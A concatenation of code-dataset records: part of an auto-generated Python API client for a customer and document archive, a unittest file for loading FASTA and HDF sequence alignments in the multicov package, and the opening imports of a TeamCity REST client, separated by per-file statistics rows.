'cid': 'cid',
'did': 'did',
},
'location_map': {
'alias': 'path',
'cid': 'path',
'did': 'path',
'to_update': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client
)
def create_customer_using_post(
self,
alias,
to_save,
**kwargs
):
"""Create a new customer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_customer_using_post(alias, to_save, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
to_save (CustomerToSave): toSave
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CreationResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['to_save'] = \
to_save
return self.create_customer_using_post_endpoint.call_with_http_info(**kwargs)
def create_document_using_post(
self,
alias,
id,
to_save,
**kwargs
):
"""Create a new document for customer archive # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_document_using_post(alias, id, to_save, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
id (str): id
to_save (DocumentToSave): toSave
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CreationResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['id'] = \
id
kwargs['to_save'] = \
to_save
return self.create_document_using_post_endpoint.call_with_http_info(**kwargs)
def get_customer_order_by_fields_using_get(
self,
alias,
**kwargs
):
"""Get possible fields for orderby of customer fields # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_order_by_fields_using_get(alias, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[str]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
return self.get_customer_order_by_fields_using_get_endpoint.call_with_http_info(**kwargs)
def get_customer_using_get(
self,
alias,
id,
**kwargs
):
"""Get one specific customer by id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_using_get(alias, id, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
id (str): id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Customer
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['id'] = \
id
return self.get_customer_using_get_endpoint.call_with_http_info(**kwargs)
def get_document_binary_using_get(
self,
alias,
cid,
did,
**kwargs
):
"""Get document of customer as blob # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_document_binary_using_get(alias, cid, did, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
cid (str): cid
did (str): did
Keyword Args:
image_width (int): imageWidth. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
str
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['cid'] = \
cid
kwargs['did'] = \
did
return self.get_document_binary_using_get_endpoint.call_with_http_info(**kwargs)
def get_document_using_get(
self,
alias,
cid,
did,
**kwargs
):
"""Get one specfic document by id (without binary) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_document_using_get(alias, cid, did, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
cid (str): cid
did (str): did
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Document
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['cid'] = \
cid
kwargs['did'] = \
did
return self.get_document_using_get_endpoint.call_with_http_info(**kwargs)
def get_marketing_contacts_using_get(
self,
alias,
id,
**kwargs
):
"""Get marketingcontacts for specific customer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_marketing_contacts_using_get(alias, id, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
id (str): id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ListResultWrapperMarketingContact
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['id'] = \
id
return self.get_marketing_contacts_using_get_endpoint.call_with_http_info(**kwargs)
def search_customers_using_post(
self,
alias,
customer_search_query,
**kwargs
):
"""Get a list of customers # noqa: E501
Get a list of customers by a search query, paging is used, specify limit and page; Model Type: Customer is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_customers_using_post(alias, customer_search_query, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
customer_search_query (CustomerSearchQuery): customerSearchQuery
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ListResultWrapperCustomer
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['customer_search_query'] = \
customer_search_query
return self.search_customers_using_post_endpoint.call_with_http_info(**kwargs)
def search_documents_using_post(
self,
alias,
id,
search_query,
**kwargs
):
"""Get a list of customer documents (without binary) # noqa: E501
Get a list of customer documents by a search query, paging is used, specify limit and page; Model Type: Documents is returned. Document is a wrapper, use id with documents/{id}/binary to get document binary itself # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_documents_using_post(alias, id, search_query, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
id (str): id
search_query (DocumentSearchQuery): searchQuery
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ListResultWrapperDocument
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['id'] = \
id
kwargs['search_query'] = \
search_query
return self.search_documents_using_post_endpoint.call_with_http_info(**kwargs)
def search_documents_using_post1(
self,
alias,
id,
search_query,
**kwargs
):
"""Get a list of treatment documents (without binary) # noqa: E501
Get a list of treatment documents by a search query, paging is used, specify limit and page; Model Type: Documents is returned. Document is a wrapper, use id with documents/{id}/binary to get document binary itself # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_documents_using_post1(alias, id, search_query, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
id (str): id
search_query (DocumentSearchQuery): searchQuery
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ListResultWrapperDocument
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['id'] = \
id
kwargs['search_query'] = \
search_query
return self.search_documents_using_post1_endpoint.call_with_http_info(**kwargs)
def update_customer_using_patch(
self,
alias,
id,
to_update,
**kwargs
):
"""Update customer with given id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_using_patch(alias, id, to_update, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
id (str): id
to_update (CustomerToSave): toUpdate
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['id'] = \
id
kwargs['to_update'] = \
to_update
return self.update_customer_using_patch_endpoint.call_with_http_info(**kwargs)
def update_document_using_patch(
self,
alias,
cid,
did,
to_update,
**kwargs
):
"""Update document with given id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_document_using_patch(alias, cid, did, to_update, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
cid (str): cid
did (str): did
to_update (DocumentToSave): toUpdate
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['cid'] = \
cid
kwargs['did'] = \
did
kwargs['to_update'] = \
to_update
return self.update_document_using_patch_endpoint.call_with_http_info(**kwargs)
| 35.234936
| 1,241
| 0.477017
| 5,204
| 57,891
| 5.069562
| 0.055534
| 0.031385
| 0.023652
| 0.024562
| 0.879842
| 0.869419
| 0.855887
| 0.839588
| 0.816921
| 0.804298
| 0
| 0.00287
| 0.434333
| 57,891
| 1,642
| 1,242
| 35.256395
| 0.802761
| 0.341625
| 0
| 0.716535
| 0
| 0
| 0.217918
| 0.052692
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011374
| false
| 0
| 0.012248
| 0
| 0.034996
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
205baa3cf0690d8d72e7af2c5f6b9685e87f2486
| 8,738
|
py
|
Python
|
test_align_io.py
|
ttesileanu/PyMulticov
|
03efb92b7391f60e6d1974709c67c7770eede10d
|
[
"MIT"
] | null | null | null |
test_align_io.py
|
ttesileanu/PyMulticov
|
03efb92b7391f60e6d1974709c67c7770eede10d
|
[
"MIT"
] | null | null | null |
test_align_io.py
|
ttesileanu/PyMulticov
|
03efb92b7391f60e6d1974709c67c7770eede10d
|
[
"MIT"
] | null | null | null |
import unittest
import os
class TestLoadFasta(unittest.TestCase):
def test_protein_unchanged_invalid(self):
from multicov.alignment import Alignment
from multicov.align_io import load_fasta
from multicov.alphabet import protein_alphabet
align = load_fasta(os.path.join('test_data', 'test_aln1.fasta'), protein_alphabet,
invalid_letter_policy='unchanged')
expected = Alignment(['IVGGYTCQ', 'XVGGTEAQ', 'IGG-KDT-'], alphabet=protein_alphabet)
expected.annotations['name'] = ['seq1', 'seq2', 'seq3']
self.assertEqual(align, expected)
def test_protein_keep_annot_ws(self):
from multicov.alignment import Alignment
from multicov.align_io import load_fasta
from multicov.alphabet import protein_alphabet
align = load_fasta(os.path.join('test_data', 'test_aln1.fasta'), protein_alphabet, strip_ws_in_annot=False)
expected = Alignment(['IVGGYTCQ', '-VGGTEAQ', 'IGG-KDT-'], alphabet=protein_alphabet)
expected.annotations['name'] = ['seq1 ', ' seq2', 'seq3']
self.assertEqual(align, expected)
def test_dna_unchanged_invalid(self):
from multicov.alignment import Alignment
from multicov.align_io import load_fasta
from multicov.alphabet import dna_alphabet
align = load_fasta(os.path.join('test_data', 'test_aln2.fasta'), dna_alphabet,
invalid_letter_policy='unchanged')
expected = Alignment(['GATTACA', 'ACCA--T', 'G.c-a-c'], dna_alphabet)
expected.annotations['name'] = ['one', 'sequence', 'one line']
self.assertEqual(align, expected)
def test_replace_invalid_by_gap_protein(self):
from multicov.alignment import Alignment
from multicov.align_io import load_fasta
from multicov.alphabet import protein_alphabet
align = load_fasta(os.path.join('test_data', 'test_aln1.fasta'), protein_alphabet, invalid_letter_policy='gap')
expected = Alignment(['IVGGYTCQ', '-VGGTEAQ', 'IGG-KDT-'], alphabet=protein_alphabet)
expected.annotations['name'] = ['seq1', 'seq2', 'seq3']
self.assertEqual(align, expected)
def test_replace_invalid_by_gap_dna(self):
from multicov.alignment import Alignment
from multicov.align_io import load_fasta
from multicov.alphabet import dna_alphabet
align = load_fasta(os.path.join('test_data', 'test_aln2.fasta'), dna_alphabet, invalid_letter_policy='gap')
expected = Alignment(['GATTACA', 'ACCA--T', 'G------'], dna_alphabet)
expected.annotations['name'] = ['one', 'sequence', 'one line']
self.assertEqual(align, expected)
def test_replace_invalid_by_uppercase_then_gap(self):
from multicov.alignment import Alignment
from multicov.align_io import load_fasta
from multicov.alphabet import dna_alphabet
align = load_fasta(os.path.join('test_data', 'test_aln2.fasta'), dna_alphabet, invalid_letter_policy='uppergap')
expected = Alignment(['GATTACA', 'ACCA--T', 'G-C-A-C'], dna_alphabet)
expected.annotations['name'] = ['one', 'sequence', 'one line']
self.assertEqual(align, expected)
def test_replace_invalid_by_uppercase_then_leave(self):
from multicov.alignment import Alignment
from multicov.align_io import load_fasta
from multicov.alphabet import dna_alphabet
align = load_fasta(os.path.join('test_data', 'test_aln2.fasta'), dna_alphabet, invalid_letter_policy='upper')
expected = Alignment(['GATTACA', 'ACCA--T', 'G.C-A-C'], dna_alphabet)
expected.annotations['name'] = ['one', 'sequence', 'one line']
self.assertEqual(align, expected)
def test_mask_from_first_seq(self):
from multicov.alignment import Alignment
from multicov.align_io import load_fasta
from multicov.alphabet import protein_alphabet
from numpy import in1d
align = load_fasta(os.path.join('test_data', 'test_aln1.fasta'), protein_alphabet,
invalid_letter_policy='unchanged',
mask_fct=lambda s: ~in1d(list(s), ['V', 'G']))
expected = Alignment(['IYTCQ', 'XTEAQ', 'IKDT-'], alphabet=protein_alphabet)
expected.annotations['name'] = ['seq1', 'seq2', 'seq3']
self.assertEqual(align, expected)
def test_mask_before_process(self):
from multicov.alignment import ReferenceMapping
from multicov.align_io import load_fasta
from multicov.alphabet import protein_alphabet
align = load_fasta(os.path.join('test_data', 'test_aln3.fasta'), protein_alphabet,
invalid_letter_policy='upper',
mask_fct=lambda s: [not _.islower() for _ in s])
align0 = load_fasta(os.path.join('test_data', 'test_aln3.fasta'), protein_alphabet,
invalid_letter_policy='unchanged')
mask = [not _.islower() for _ in align0[0, :]]
expected = align0.truncate_columns(mask)
expected.reference = ReferenceMapping(list(range(expected.data.shape[1])))
self.assertEqual(align, expected)
def test_mask_upper(self):
from multicov.alignment import ReferenceMapping
from multicov.align_io import load_fasta
from multicov.alphabet import protein_alphabet
align = load_fasta(os.path.join('test_data', 'test_aln3.fasta'), protein_alphabet,
invalid_letter_policy='upper',
mask_fct='upper')
align0 = load_fasta(os.path.join('test_data', 'test_aln3.fasta'), protein_alphabet,
invalid_letter_policy='unchanged')
mask = [not _.islower() and _ != '.' for _ in align0[0, :]]
expected = align0.truncate_columns(mask)
expected.reference = ReferenceMapping(list(range(expected.data.shape[1])))
self.assertEqual(align, expected)
def test_mask_upper_gap(self):
from multicov.alignment import ReferenceMapping
from multicov.align_io import load_fasta
from multicov.alphabet import protein_alphabet
align = load_fasta(os.path.join('test_data', 'test_aln3.fasta'), protein_alphabet,
invalid_letter_policy='upper',
mask_fct='uppernogap')
align0 = load_fasta(os.path.join('test_data', 'test_aln3.fasta'), protein_alphabet,
invalid_letter_policy='unchanged')
mask = [not _.islower() and _ != '.' and _ != '-' for _ in align0[0, :]]
expected = align0.truncate_columns(mask)
expected.reference = ReferenceMapping(list(range(expected.data.shape[1])))
self.assertEqual(align, expected)
class TestHDFStoreIO(unittest.TestCase):
def test_load(self):
from multicov.align_io import from_hdf
from multicov.alignment import Alignment
from multicov.alphabet import protein_alphabet
from pandas import HDFStore
store = HDFStore(os.path.join('test_data', 'test_aln.h5'), 'r')
align = from_hdf(store, 'align1')
expected = Alignment(['IVGGYTCQ', '-VGGTEAQ', 'IGG-KDT-'], protein_alphabet)
expected.annotations['seqw'] = [0.5, 1, 0.5]
store.close()
self.assertEqual(align, expected)
def test_load_multi_alpha(self):
from multicov.align_io import from_hdf
from multicov.alignment import Alignment
from multicov.alphabet import protein_alphabet, dna_alphabet
from pandas import HDFStore
store = HDFStore(os.path.join('test_data', 'test_aln.h5'), 'r')
align = from_hdf(store, 'align2')
expected = Alignment(['IVGGYTCQ', '-VGGTEAQ', 'IGG-KDT-'], protein_alphabet)
expected2 = Alignment(['AGCT', '-G-G', 'TA-T'], dna_alphabet)
expected.add(expected2)
store.close()
self.assertEqual(align, expected)
def test_roundtrip(self):
from multicov.align_io import from_hdf, to_hdf
from multicov.alignment import Alignment
from multicov.alphabet import protein_alphabet, dna_alphabet
from pandas import HDFStore
align = Alignment(['IVGGYTCQ', '-VGGTEAQ', 'IGG-KDT-'], protein_alphabet)
align2 = Alignment(['AGCT', '-G-G', 'TA-T'], dna_alphabet)
align.add(align2)
store = HDFStore(os.path.join('test_data', 'tmp.h5'), 'w')
to_hdf(align, store, 'test_align')
store.close()
store = HDFStore(os.path.join('test_data', 'tmp.h5'), 'r')
reloaded = from_hdf(store, 'test_align')
store.close()
os.remove(os.path.join('test_data', 'tmp.h5'))
self.assertEqual(align, reloaded)
| 50.508671
| 120
| 0.657931
| 1,027
| 8,738
| 5.380721
| 0.114898
| 0.091205
| 0.034383
| 0.048136
| 0.908252
| 0.898661
| 0.895223
| 0.871878
| 0.818675
| 0.805646
| 0
| 0.008719
| 0.225566
| 8,738
| 172
| 121
| 50.802326
| 0.807891
| 0
| 0
| 0.642384
| 0
| 0
| 0.11387
| 0
| 0
| 0
| 0
| 0
| 0.092715
| 1
| 0.092715
| false
| 0
| 0.317881
| 0
| 0.423841
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
20a03995ba16e1d38a9e7622987f2f7e19149e19
| 510,655
|
py
|
Python
|
dohq_teamcity/api/build_type_api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 23
|
2018-10-19T07:28:45.000Z
|
2021-11-12T12:46:09.000Z
|
dohq_teamcity/api/build_type_api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 31
|
2018-10-16T05:53:11.000Z
|
2021-09-09T14:44:14.000Z
|
dohq_teamcity/api/build_type_api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 12
|
2018-10-28T23:00:17.000Z
|
2021-09-07T12:07:13.000Z
|
# coding: utf-8
"""
TeamCity REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2018.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
from dohq_teamcity.custom.base_model import TeamCityObject
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dohq_teamcity.models.agent_requirement import AgentRequirement # noqa: F401,E501
from dohq_teamcity.models.agent_requirements import AgentRequirements # noqa: F401,E501
from dohq_teamcity.models.artifact_dependencies import ArtifactDependencies # noqa: F401,E501
from dohq_teamcity.models.artifact_dependency import ArtifactDependency # noqa: F401,E501
